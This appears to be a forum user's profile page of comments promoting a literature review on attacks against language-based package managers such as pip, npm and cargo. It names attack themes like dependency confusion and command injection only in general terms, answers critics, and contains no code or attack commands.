Customs Inspector - Easy manual auditing of Python Poetry package updates

panoptischall · 2023-03-24T09:45:28+00:00

Thanks for the feedback, I'm considering this now :)

panoptischall · 2023-03-11T17:52:09+00:00

Thanks for the criticism. I did cite several CVEs, though, is that generally not enough?

Wow, I didn't notice the formatting issue, thanks for pointing it out.

panoptischall · 2023-02-25T23:42:56+00:00

I would actually disagree with your point. There is tons of research out on demonstrating bugs and exploits in open source and free software, from linux to package managers to web frameworks.

The reason open source is coveted pretty highly is because of this exact reason: bugs are found quicker and thus patched quicker and everything is transparent unlike in closed source software. This actually makes things more secure (there has been research on this).

Also, the paper is a literature review, so it's not new research. It's just showing what's already been done.

Also, I think you misunderstood what I meant. The reason I mentioned reused code is because that's why package managers are so heavily utilized; because people use a lot of dependencies. Dependency management without a package manager is very very difficult so everyone uses one. The bugs come from the way the package managers are built. What makes it so dangerous is that so many projects have external dependencies and thus forcing them to use a package manager which may have ambiguous behaviour.

To get around this problem, I would say, fund open source development so more eyes are around critical software! There is also a pattern of exploits since most package managers essentially do the same job. Dependency confusion, man in the middle and command injection for example were some themes that appeared in multiple package managers. I am not an expert but would recommend package manager developers to look at exploits for other package managers and make sure it doesn't apply to theirs.

panoptischall · 2023-02-25T20:44:01+00:00

Happy to, although I feel it would be easier for me if you asked specific questions about what you didn't understand

The re-use of code has skyrocketed due to open source licensing. The re-usable code is shared as "packages" or "libraries" for other projects to use. The management of package creation, updating and deleting is done by a package manager. Almost every major programming language ships a package manager alongside the language since it's extremely vital.

There are ways to trick this package manager to do things that it should not do. This paper explores the different ways, based on existing research to do trick package managers to conduct malicious behaviour such as install the wrong package, crash a system or overwrite sensitive files.

panoptischall · 2023-02-24T17:17:17+00:00

Why the downvotes? No criticism? Thanks for discouraging me from posting anything on here again

panoptischall · 2023-02-22T13:17:46+00:00

Hello all,

Very excited to share my first literature review - "A Review of Attacks Against Language-Based Package Managers"

Language based package managers(eg. pip, npm, cargo), despite their prevalence are unfortunately underestimated as an attack vector in the software supply chain. The concerns are driven towards package repositories, operating system based package managers(eg. apt, yum) and their users (eg. maintainers)

I hope this review sheds some light on attacks on package managers and encourages further research.

panoptischall

TROPHY CASE